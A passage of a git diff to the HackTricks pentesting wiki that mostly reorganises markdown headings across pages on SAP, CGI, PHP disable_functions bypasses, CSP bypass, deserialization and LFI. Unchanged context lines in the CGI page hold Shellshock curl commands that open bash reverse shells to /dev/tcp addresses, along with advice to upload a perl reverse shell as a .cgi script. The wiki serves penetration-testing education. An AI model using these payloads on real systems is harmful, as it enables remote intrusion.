login to SAP GUI using basic credentials, you are able to check the parameter values. Many basic and custom configuration parameter values ​​are considered vulnerabilities. You can check parameter values ​​both manually and automatically, using scripts (e.g. [SAP Parameter Validator](https://github.com/damianStrojek/SAPPV)). -## Manual Parameter Checking +### Manual Parameter Checking By navigating to Transaction Code `RSPFPAR`, you can query different parameters and look up their values. @@ -227,7 +229,7 @@ For example, if gw/reg_no_conn_info is set to less than 255 (`<255`), the | `snc/enable` | `0` | Enables or disables Secure Network Communication (SNC). | | `ucon/rfc/active` | `0` | Activates or deactivates UCON (Unified Connectivity) RFCs. | -## Script for Parameter Checking +### Script for Parameter Checking Due to the number of parameters, it is also possible to export all of them to an .XML file and use the script [SAPPV (SAP Parameter Validator)](https://github.com/damianStrojek/SAPPV), which will check all the above-mentioned parameters and print them values ​​with appropriate distinction. @@ -261,7 +263,7 @@ Vulnerability: "SAP Parameter Misconfiguration: bdc/bdel_auth_check" [...] ``` -# Attack! +## Attack! - Check if it runs on old servers or technologies like Windows 2000. - Plan the possible exploits / attacks, there are a lot of Metasploit modules for SAP discovery \(auxiliary modules\) and exploits: @@ -363,7 +365,7 @@ bizploit/plugins> back bizploit> start ``` -# Other Useful Tools for Testing +## Other Useful Tools for Testing - [PowerSAP](https://github.com/airbus-seclab/powersap) - Powershell tool to assess sap security - [Burp Suite](https://portswigger.net/burp) - a must have for directory fuzzing and web security assessments diff --git a/src/network-services-pentesting/pentesting-snmp/snmp-rce.md b/src/network-services-pentesting/pentesting-snmp/snmp-rce.md index 2af97c5cc..da0ba2c15 100644 --- a/src/network-services-pentesting/pentesting-snmp/snmp-rce.md +++ b/src/network-services-pentesting/pentesting-snmp/snmp-rce.md @@ -1,7 +1,7 @@ -{{#include ../../banners/hacktricks-training.md}} - # SNMP RCE +{{#include ../../banners/hacktricks-training.md}} + SNMP can be exploited by an attacker if the administrator overlooks its default configuration on the device or server. By **abusing SNMP community with write permissions (rwcommunity)** on a Linux operating system, the attacker can execute commands on the server. ## Extending Services with Additional Commands diff --git a/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md b/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md index 9f62440af..19eb898d5 100644 --- a/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md +++ b/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md @@ -1,3 +1,5 @@ +# AEM (Adobe Experience Manager) Pentesting + {{#include ../../banners/hacktricks-training.md}} Find vulnerabilities and missconfigurations with [https://github.com/0ang3el/aem-hacker](https://github.com/0ang3el/aem-hacker) diff --git a/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md b/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md index f288873e3..89777cff6 100644 --- a/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md +++ b/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md @@ -1,3 +1,5 @@ +# Artifactory Hacking Guide + {{#include ../../banners/hacktricks-training.md}} **Check this post:** [**https://www.errno.fr/artifactory/Attacking_Artifactory**](https://www.errno.fr/artifactory/Attacking_Artifactory) diff --git a/src/network-services-pentesting/pentesting-web/cgi.md b/src/network-services-pentesting/pentesting-web/cgi.md index 49ea51881..a3625f877 100644 --- a/src/network-services-pentesting/pentesting-web/cgi.md +++ b/src/network-services-pentesting/pentesting-web/cgi.md @@ -1,12 +1,14 @@ +# CGI Pentesting + {{#include ../../banners/hacktricks-training.md}} -# Information +## Information The **CGI scripts are perl scripts**, so, if you have compromised a server that can execute _**.cgi**_ scripts you can **upload a perl reverse shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **change the extension** from **.pl** to **.cgi**, give **execute permissions** \(`chmod +x`\) and **access** the reverse shell **from the web browser** to execute it. In order to test for **CGI vulns** it's recommended to use `nikto -C all` \(and all the plugins\) -# **ShellShock** +## **ShellShock** **ShellShock** is a **vulnerability** that affects the widely used **Bash** command-line shell in Unix-based operating systems. It targets the ability of Bash to run commands passed by applications. The vulnerability lies in the manipulation of **environment variables**, which are dynamic named values that impact how processes run on a computer. Attackers can exploit this by attaching **malicious code** to environment variables, which is executed upon receiving the variable. This allows attackers to potentially compromise the system. @@ -14,7 +16,7 @@ Exploiting this vulnerability the **page could throw an error**. You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi_mod** \(with cgi folder\) or using **nikto**. -## **Test** +### **Test** Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them. @@ -41,7 +43,7 @@ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http: python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi ``` -## Exploit +### Exploit ```bash #Bind Shell @@ -57,13 +59,13 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt > run ``` -# **Proxy \(MitM to Web server requests\)** +## **Proxy \(MitM to Web server requests\)** CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com" As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: <IP_attacker>:<PORT>**" and if the server performs any request during the session. You will be able to capture each request made by the server. -# Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) +## Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) Basically if cgi is active and php is "old" \(<5.3.12 / < 5.4.2\) you can execute code. In order t exploit this vulnerability you need to access some PHP file of the web server without sending parameters \(specially without sending the character "="\). diff --git a/src/network-services-pentesting/pentesting-web/golang.md b/src/network-services-pentesting/pentesting-web/golang.md index 26eb1eeda..6b8d5aa30 100644 --- a/src/network-services-pentesting/pentesting-web/golang.md +++ b/src/network-services-pentesting/pentesting-web/golang.md @@ -1,3 +1,5 @@ +# GoLang HTTP CONNECT Method + {{#include ../../banners/hacktricks-training.md}} ## CONNECT method diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md index e1f35255a..a44460e2a 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md @@ -1,3 +1,5 @@ +# Disable Functions Bypass - dl Function + {{#include ../../../../banners/hacktricks-training.md}} **Important note:** diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md index 4bf7a6ee0..68e1ff348 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md @@ -1,6 +1,7 @@ +# Imagick <= 3.3.0 PHP >= 5.4 Exploit + {{#include ../../../../banners/hacktricks-training.md}} -# Imagick <= 3.3.0 PHP >= 5.4 Exploit From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md index ef4568d94..172a3fe1e 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md @@ -1,6 +1,7 @@ +# mod_cgi + {{#include ../../../../banners/hacktricks-training.md}} -# mod_cgi From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md index 332701786..ac9e564dd 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md @@ -1,6 +1,7 @@ +# PHP 4 >= 4.2.0, PHP 5 pcntl_exec + {{#include ../../../../banners/hacktricks-training.md}} -# PHP 4 >= 4.2.0, PHP 5 pcntl_exec From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md index 8139e085d..87926c202 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md @@ -1,6 +1,7 @@ +# PHP 5.2 - FOpen Exploit + {{#include ../../../../banners/hacktricks-training.md}} -# PHP 5.2 - FOpen Exploit From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md index 275a89fcb..58151ae5f 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md @@ -1,6 +1,7 @@ +# PHP 5.2.3 - Win32std ext Protections Bypass + {{#include ../../../../banners/hacktricks-training.md}} -# PHP 5.2.3 - Win32std ext Protections Bypass From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md index a67293d7a..47c3814e4 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md @@ -1,6 +1,7 @@ +# PHP 5.2.4 and 5.2.5 PHP cURL + {{#include ../../../../banners/hacktricks-training.md}} -# PHP 5.2.4 and 5.2.5 PHP cURL From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md index 5de0479fa..349e27949 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md @@ -1,6 +1,7 @@ +# PHP <= 5.2.9 on windows + {{#include ../../../../banners/hacktricks-training.md}} -# PHP <= 5.2.9 on windows From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md index d2d36c32d..102dcb799 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md @@ -1,6 +1,7 @@ +# PHP Perl Extension Safe_mode Bypass Exploit + {{#include ../../../../banners/hacktricks-training.md}} -# PHP Perl Extension Safe_mode Bypass Exploit From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md index c51679b30..514431938 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md @@ -1,6 +1,6 @@ -{{#include ../../../../banners/hacktricks-training.md}} +# PHP safe_mode bypass via proc_open and custom environment Exploit -# PHP safe_mode bypass via proc_open\(\) and custom environment Exploit +{{#include ../../../../banners/hacktricks-training.md}} From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md index 5c0d4445f..9fa7124e8 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md @@ -1,7 +1,7 @@ -{{#include ../../../../banners/hacktricks-training.md}} - # via mem +{{#include ../../../../banners/hacktricks-training.md}} + From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) ```php diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md index e8a256123..545ac259d 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md @@ -1,6 +1,7 @@ +# PHP 5.2.4 ionCube extension Exploit + {{#include ../../../../banners/hacktricks-training.md}} -# PHP 5.2.4 ionCube extension Exploit ```php @@ -9,7 +11,7 @@ msf> use auxiliary/scanner/vmware/esx_fingerprint msf> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump ``` -# Bruteforce +## Bruteforce ```bash msf> auxiliary/scanner/vmware/vmware_http_login diff --git a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md index cdbe1d288..3ae0bc0a3 100644 --- a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md +++ b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md @@ -1,3 +1,5 @@ +# CSP Bypass via Self + Unsafe Inline with Iframes + {{#include ../../banners/hacktricks-training.md}} A configuration such as: @@ -10,7 +12,7 @@ Prohibits usage of any functions that execute code transmitted as a string. For Any content from external sources is also blocked, including images, CSS, WebSockets, and, especially, JS -### Via Text & Images +## Via Text & Images It's observed that modern browsers convert images and texts into HTML to enhance their display (e.g., setting backgrounds, centering, etc.). Consequently, if an image or text file, such as `favicon.ico` or `robots.txt`, is opened via an `iframe`, it's rendered as HTML. Notably, these pages often lack CSP headers and may not include X-Frame-Options, enabling the execution of arbitrary JavaScript from them: @@ -23,7 +25,7 @@ script.src = "//example.com/csp.js" window.frames[0].document.head.appendChild(script) ``` -### Via Errors +## Via Errors Similarly, error responses, like text files or images, typically come without CSP headers and might omit X-Frame-Options. Errors can be induced to load within an iframe, allowing for the following actions: diff --git a/src/pentesting-web/deserialization/README.md b/src/pentesting-web/deserialization/README.md index 67d19aa86..d072dffd3 100644 --- a/src/pentesting-web/deserialization/README.md +++ b/src/pentesting-web/deserialization/README.md @@ -767,7 +767,7 @@ Take a look to [this POST about **how to try to exploit the \_\_ViewState parame To mitigate the risks associated with deserialization in .Net: - **Avoid allowing data streams to define their object types.** Utilize `DataContractSerializer` or `XmlSerializer` when possible. -- **For `JSON.Net`, set `TypeNameHandling` to `None`:** %%%TypeNameHandling = TypeNameHandling.None%%% +- **For `JSON.Net`, set `TypeNameHandling` to `None`:** `TypeNameHandling = TypeNameHandling.None` - **Avoid using `JavaScriptSerializer` with a `JavaScriptTypeResolver`.** - **Limit the types that can be deserialized**, understanding the inherent risks with .Net types, such as `System.IO.FileInfo`, which can modify server files' properties, potentially leading to denial of service attacks. - **Be cautious with types having risky properties**, like `System.ComponentModel.DataAnnotations.ValidationException` with its `Value` property, which can be exploited. diff --git a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md index 0ad3bf5f8..28ed22a5a 100644 --- a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md +++ b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md @@ -1,8 +1,10 @@ +# Basic Java Deserialization with ObjectInputStream readObject + {{#include ../../banners/hacktricks-training.md}} In this POST it's going to be explained an example using `java.io.Serializable`. -# Serializable +## Serializable The Java `Serializable` interface (`java.io.Serializable` is a marker interface your classes must implement if they are to be **serialized** and **deserialized**. Java object serialization (writing) is done with the [ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html) and deserialization (reading) is done with the [ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html). @@ -82,7 +84,7 @@ public class TestDeserialization { } ``` -## Conclusion +### Conclusion As you can see in this very basic example, the "vulnerability" here appears because the **readObject** function is **calling other vulnerable functions**. diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md b/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md index 6fc4df6ae..411e75f35 100644 --- a/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md +++ b/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md @@ -1,3 +1,5 @@ +# Exploiting __VIEWSTATE Knowing the Secret + {{#include ../../banners/hacktricks-training.md}} **Check the amazing post from** [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) diff --git a/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md b/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md index 5f80ff684..9ac13a058 100644 --- a/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md +++ b/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md @@ -1,3 +1,5 @@ +# Java JSF ViewState Deserialization + {{#include ../../banners/hacktricks-training.md}} Check the posts: diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md index 292132550..6994d0027 100644 --- a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md +++ b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md @@ -1,3 +1,5 @@ +# LFI to RCE via PHPInfo + {{#include ../../banners/hacktricks-training.md}} To exploit this vulnerability you need: **A LFI vulnerability, a page where phpinfo() is displayed, "file_uploads = on" and the server has to be able to write in the "/tmp" directory.** diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md b/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md index 726de4d97..ea0efbca2 100644 --- a/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md +++ b/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md @@ -1,3 +1,5 @@ +# LFI to RCE via Temporary File Uploads + {{#include ../../banners/hacktricks-training.md}} **Check the full details of this technique in [https://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf](https://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf)** @@ -11,7 +13,7 @@ When a **PHP** engine receives a **POST request** containing files formatted acc The challenge for unauthorized access lies in predicting the temporary file's name, which is intentionally randomized. -#### Exploitation on Windows Systems +### Exploitation on Windows Systems On Windows, PHP generates temporary file names using the `GetTempFileName` function, resulting in a pattern like `\
.TMP`. Notably:
 
@@ -27,7 +29,7 @@ http://site/vuln.php?inc=c:\windows\temp\php<<
 
 In certain situations, a more specific mask (like `php1<<` or `phpA<<`) might be required. One can systematically try these masks to discover the uploaded temporary file.
 
-#### Exploitation on GNU/Linux Systems
+### Exploitation on GNU/Linux Systems
 
 For GNU/Linux systems, the randomness in temporary file naming is robust, rendering the names neither predictable nor susceptible to brute force attacks. Further details can be found in the referenced documentation.
 
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-bomb.md b/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
index bc05f3864..34d841d38 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
@@ -1,3 +1,5 @@
+# Cookie Bomb
+
 {{#include ../../banners/hacktricks-training.md}}
 
 **`Cookie bomb`** involves **adding a significant number of large cookies to a domain and its subdomains targeting a user**. This action results in the victim **sending oversized HTTP requests** to the server, which are subsequently **rejected by the server**. The consequence of this is the induction of a Denial of Service (DoS) specifically targeted at a user within that domain and its subdomains.
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md b/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
index 332ae966c..048ef16f1 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
@@ -1,3 +1,5 @@
+# Cookie Jar Overflow
+
 {{#include ../../banners/hacktricks-training.md}}
 
 The browsers have a **limit on the number of cookies** that they can store for a page. Then, if for some reason you need to **make a cookie disappear**, you can **overflow the cookie jar** as the oldest ones will be deleted before:
diff --git a/src/pentesting-web/idor.md b/src/pentesting-web/idor.md
index 3fbd56fa5..3542595a3 100644
--- a/src/pentesting-web/idor.md
+++ b/src/pentesting-web/idor.md
@@ -1,3 +1,5 @@
+# IDOR (Insecure Direct Object Reference)
+
 {{#include ../banners/hacktricks-training.md}}
 
 **Check the post: [https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)**
diff --git a/src/pentesting-web/login-bypass/sql-login-bypass.md b/src/pentesting-web/login-bypass/sql-login-bypass.md
index bbca02d0d..583a3b07e 100644
--- a/src/pentesting-web/login-bypass/sql-login-bypass.md
+++ b/src/pentesting-web/login-bypass/sql-login-bypass.md
@@ -1,3 +1,5 @@
+# SQL Login Bypass Payloads
+
 {{#include ../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-web/reverse-tab-nabbing.md b/src/pentesting-web/reverse-tab-nabbing.md
index 324c022da..860b0c2fa 100644
--- a/src/pentesting-web/reverse-tab-nabbing.md
+++ b/src/pentesting-web/reverse-tab-nabbing.md
@@ -1,6 +1,8 @@
+# Reverse Tab Nabbing
+
 {{#include ../banners/hacktricks-training.md}}
 
-# Description
+## Description
 
 In a situation where an **attacker** can **control** the **`href`** argument of an **`
+### Examples 
 
 Create the following pages in a folder and run a web server with `python3 -m http.server`\
 Then, **access** `http://127.0.0.1:8000/`vulnerable.html, **click** on the link and note how the **original** **website** **URL** **changes**.
@@ -58,7 +60,7 @@ Then, **access** `http://127.0.0.1:8000/`vulnerable.html, **click** on the link
 
 ```
 
-## Accessible properties 
+### Accessible properties 
 
 In the scenario where a **cross-origin** access occurs (access across different domains), the properties of the **window** JavaScript class instance, referred to by the **opener** JavaScript object reference, that can be accessed by a malicious site are limited to the following:
 
@@ -72,7 +74,7 @@ In the scenario where a **cross-origin** access occurs (access across different
 
 However, in instances where the domains are identical, the malicious site gains access to all properties exposed by the [**window**](https://developer.mozilla.org/en-US/docs/Web/API/Window) JavaScript object reference.
 
-# Prevention
+## Prevention
 
 Prevention information are documented into the [HTML5 Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html#tabnabbing).
 
diff --git a/src/pentesting-web/saml-attacks/saml-basics.md b/src/pentesting-web/saml-attacks/saml-basics.md
index faa2ce5f2..2817e53a8 100644
--- a/src/pentesting-web/saml-attacks/saml-basics.md
+++ b/src/pentesting-web/saml-attacks/saml-basics.md
@@ -1,15 +1,17 @@
+# SAML Basics
+
 {{#include ../../banners/hacktricks-training.md}}
 
-# SAML Overview
+## SAML Overview
 
 **Security Assertion Markup Language (SAML)** enables identity providers (IdP) to be utilized for sending authorization credentials to service providers (SP), facilitating single sign-on (SSO). This approach simplifies the management of multiple logins by allowing a single set of credentials to be used across multiple websites. It leverages XML for standardized communication between IdPs and SPs, linking the authentication of user identity with service authorization.
 
-## Comparison between SAML and OAuth
+### Comparison between SAML and OAuth
 
 - **SAML** is tailored towards providing enterprises with greater control over SSO login security.
 - **OAuth** is designed to be more mobile-friendly, uses JSON, and is a collaborative effort from companies like Google and Twitter.
 
-# SAML Authentication Flow
+## SAML Authentication Flow
 
 **For further details check the full post from [https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)**. This is a summary:
 
@@ -28,7 +30,7 @@ The SAML authentication process involves several steps, as illustrated in the sc
 9. **SAML Response Validation**: The ACS validates the SAML Response.
 10. **Resource Access Granted**: Access to the initially requested resource is granted.
 
-# SAML Request Example
+## SAML Request Example
 
 Consider the scenario where a user requests access to a secure resource at [https://shibdemo-sp1.test.edu/secure/](https://shibdemo-sp1.test.edu/secure/). The SP identifies the lack of authentication and generates a SAML Request:
 
@@ -55,7 +57,7 @@ Key elements of this request include:
 
